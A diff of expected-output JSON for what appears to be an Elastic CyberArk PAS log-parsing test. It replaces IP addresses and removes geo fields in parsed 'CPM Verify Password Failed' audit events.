@@ -1596,9 +1530,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493936Z", - "original": "\u003c7\u003e1 2021-03-15T18:05:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831516\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:05:16\",\"IsoTimestamp\":\"2021-03-15T18:05:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831516\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
", + "ingested": "2021-12-09T13:37:01.193671600Z", + "original": "\u003c7\u003e1 2021-03-15T18:05:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831516\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:05:16\",\"IsoTimestamp\":\"2021-03-15T18:05:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831516\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -1621,22 +1555,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -1659,7 +1582,7 @@ }, "@timestamp": "2021-03-16T09:50:19.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -1671,28 +1594,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-16T09:50:19Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n 
\u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "4", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -1701,11 +1624,11 @@ "retries_count": "4", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615888216", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", 
@@ -1718,9 +1641,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493938Z", - "original": "\u003c7\u003e1 2021-03-16T09:50:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 02:50:19\",\"IsoTimestamp\":\"2021-03-16T09:50:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
